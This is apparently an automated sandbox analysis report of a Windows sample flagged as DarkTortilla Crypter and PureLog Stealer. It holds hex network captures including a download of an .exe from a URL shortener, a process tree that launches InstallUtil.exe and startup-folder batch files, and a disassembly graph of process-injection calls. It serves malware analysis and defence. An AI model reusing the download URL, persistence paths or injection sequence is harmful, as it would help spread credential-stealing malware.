                          2024-09-12 20:02:12 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:02:12 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:02:12 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:02:12 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:02:12 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination Port
                          20192.168.2.849735188.114.96.3443
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:02:13 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:02:13 UTC902INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:02:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:02:13 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:02:13 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxS%2BBfgPygjO64cp7H0S3H3TKnR4zVvPDBeFnh%2Bq1M99d2QbEcGhfzTwIw1EoX5Rz3FDPYZmN4OfnySdUOUIWuTE0YxCUz%2F%2B0y3txyuJykJovlBIC8W0k8I%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227e712b544310-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:02:13 UTC467INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:02:13 UTC1369INData Raw: 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65
                          Data Ascii: after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta prope
                          2024-09-12 20:02:13 UTC1369INData Raw: 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                          Data Ascii: d-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-dela
                          2024-09-12 20:02:13 UTC1369INData Raw: 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d
                          Data Ascii: serAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(nam
                          2024-09-12 20:02:13 UTC1369INData Raw: 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65
                          Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                          2024-09-12 20:02:13 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                          Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                          2024-09-12 20:02:13 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:02:13 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:1
                          Start time:15:58:02
                          Start date:12/09/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x7e0000
                          File size:20'133'888 bytes
                          MD5 hash:F1C717609DD44F9E2C979FD9A0F4315C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.3516306034.0000000004E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.3517750874.0000000006910000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000001.00000002.3515760632.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:7
                          Start time:16:00:40
                          Start date:12/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0x150000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:8
                          Start time:16:00:43
                          Start date:12/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          Imagebase:0x510000
                          File size:42'064 bytes
                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:9
                          Start time:16:01:29
                          Start date:12/09/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cQXYrsQOJ3uDVcsTMDpcKVmy.bat" "
                          Imagebase:0x7ff6b4610000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:16:01:29
                          Start date:12/09/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:11
                          Start time:16:01:42
                          Start date:12/09/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JnikXG7VSGx0qVwm8oVPQ6yD.bat" "
                          Imagebase:0x7ff6b4610000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:12
                          Start time:16:01:42
                          Start date:12/09/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:13
                          Start time:16:01:50
                          Start date:12/09/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rp6RLsI5LmL2C04PREj94eun.bat" "
                          Imagebase:0x7ff6b4610000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:14
                          Start time:16:01:50
                          Start date:12/09/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:15
                          Start time:16:02:03
                          Start date:12/09/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\19S9Dp4fmqvJxlR4ciWynHCd.bat" "
                          Imagebase:0x7ff6b4610000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:16
                          Start time:16:02:03
                          Start date:12/09/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:22.7%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:7.8%
                            Total number of Nodes:77
                            Total number of Limit Nodes:6
                            execution_graph 29815 240cf30 29816 240cf44 29815->29816 29817 240cfbd 29816->29817 29825 23f2dc3 29816->29825 29829 23f38c4 29816->29829 29833 23f2f75 29816->29833 29837 23f3a55 29816->29837 29841 23f30da 29816->29841 29845 23f47ff 29816->29845 29849 23f386f 29816->29849 29853 23f4d18 29825->29853 29857 23f4d20 29825->29857 29826 23f2dd4 29831 23f4d18 VirtualProtect 29829->29831 29832 23f4d20 VirtualProtect 29829->29832 29830 23f3902 29831->29830 29832->29830 29835 23f4d18 VirtualProtect 29833->29835 29836 23f4d20 VirtualProtect 29833->29836 29834 23f2f99 29835->29834 29836->29834 29839 23f4d18 VirtualProtect 29837->29839 29840 23f4d20 VirtualProtect 29837->29840 29838 23f3a6f 29839->29838 29840->29838 29843 23f4d18 VirtualProtect 29841->29843 29844 23f4d20 VirtualProtect 29841->29844 29842 23f30eb 29843->29842 29844->29842 29847 23f4d18 VirtualProtect 29845->29847 29848 23f4d20 VirtualProtect 29845->29848 29846 23f4810 29847->29846 29848->29846 29851 23f4d18 VirtualProtect 29849->29851 29852 23f4d20 VirtualProtect 29849->29852 29850 23f3883 29851->29850 29852->29850 29854 23f4d20 VirtualProtect 29853->29854 29856 23f4da2 29854->29856 29856->29826 29858 23f4d68 VirtualProtect 29857->29858 29859 23f4da2 29858->29859 29859->29826 29805 2481f6a CloseHandle 29806 2481fd7 29805->29806 29773 23fedb8 29774 23fee00 VirtualProtectEx 29773->29774 29776 23fee3e 29774->29776 29801 23ff4e8 29802 23ff528 ResumeThread 29801->29802 29804 23ff559 29802->29804 29807 23fe918 29808 23fe960 WriteProcessMemory 29807->29808 29810 23fe9b7 29808->29810 29811 23fe5d8 29812 23fe618 VirtualAllocEx 29811->29812 29814 23fe655 29812->29814 29860 23ff708 29861 23ff893 29860->29861 29863 23ff72e 29860->29863 29863->29861 29864 23f51b8 29863->29864 29865 23ff988 PostMessageW 29864->29865 29866 23ff9f4 29865->29866 29866->29863 29777 240dfc8 29778 240e010 VirtualProtect 29777->29778 29779 240e04a 29778->29779 29780 23f7976 29781 23f74f5 29780->29781 29782 23f78c1 29781->29782 29785 23f9aa8 29781->29785 29789 23f9fb0 29781->29789 29786 23f9ab6 29785->29786 29787 23f9abd 29785->29787 29786->29781 29787->29786 29793 23fc338 29787->29793 29791 23f9fd7 29789->29791 29790 23fa191 29790->29781 29791->29790 29792 23fc338 CreateProcessAsUserW 29791->29792 29792->29791 29794 23fc3b7 CreateProcessAsUserW 29793->29794 29796 23fc4b8 29794->29796 29797 23fdef0 29798 23fdf35 Wow64GetThreadContext 29797->29798 29800 23fdf7d 29798->29800 29867 23ff280 29868 23ff2c5 Wow64SetThreadContext 29867->29868 29870 23ff30d 29868->29870

                            Executed Functions

                            Function 02404B70 Relevance: 7.0, Strings: 3, Instructions: 3280COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 2404b70-2404bbc 3 2404bc2-2404cbc 0->3 4 2404cc4-2404cc6 0->4 3->4 5 2404cc8-2404ccb 4->5 6 2404ccd-2404cdd 4->6 7 2404d0b-240614a 5->7 12 2404cf2-2404d08 6->12 13 2404cdf-2404cf0 6->13 269 2406150-24061d8 7->269 270 2407dfb 7->270 12->7 13->7 651 24061de call 2408d80 269->651 652 24061de call 2408d90 269->652 271 2407e00-2407e14 270->271 275 2407e16-2407e19 271->275 276 2407e1c-2407e24 271->276 275->276 278 2407e25-2407e39 276->278 279 2407e3d-2407e56 276->279 278->279 280 2407e98-2407ea0 279->280 281 2407e58-2407e96 279->281 283 2407ea5-2407ecc 280->283 281->280 284 2407ef8-2407f0d 283->284 285 2407ece-2407edf 283->285 286 2407ee0-2407eec 284->286 287 2407f0f-2407f44 284->287 285->286 286->283 291 2407eee-2407ef6 286->291 289 2407f74-2407f88 287->289 290 2407f46-2407f49 287->290 294 2407fe5-2408018 289->294 295 2407f8a-2407f8e 289->295 292 2407f64-2407f72 290->292 293 2407f4b-2407f60 290->293 291->284 292->289 293->292 298 24061e1-24063d4 322 24063da-24064c9 298->322 323 24064ce-24065bc 298->323 344 24065bf-2407b49 322->344 323->344 344->271 616 2407b4f-2407b6f call 2122143 344->616 617 2407b74-2407c8a 616->617 617->271 629 2407c90-2407c95 617->629 630 2407cb4-2407d8b 629->630 631 2407c97-2407caf 629->631 630->271 646 2407d8d-2407dc0 630->646 632 2407dc6-2407dfa 631->632 646->632 651->298 652->298
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$s2"m^
                            • API String ID: 0-2513698888
                            • Opcode ID: 6b6559dfb2098762ababbfb3abebe8e3fa75f36530e1a2eb2678fdf976d135da
                            • Instruction ID: 9eb68cff7a491cdc2636fc77f7dadbb0636106774238ee6727ea77f6537b654f
                            • Opcode Fuzzy Hash: 6b6559dfb2098762ababbfb3abebe8e3fa75f36530e1a2eb2678fdf976d135da
                            • Instruction Fuzzy Hash: F3539970E04658CBCB58EFB8DEC869DBBB1FB88200F4085EDD089A7255DE356D84CB65
                            Function 05E72D98 Relevance: 5.5, Instructions: 5505COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
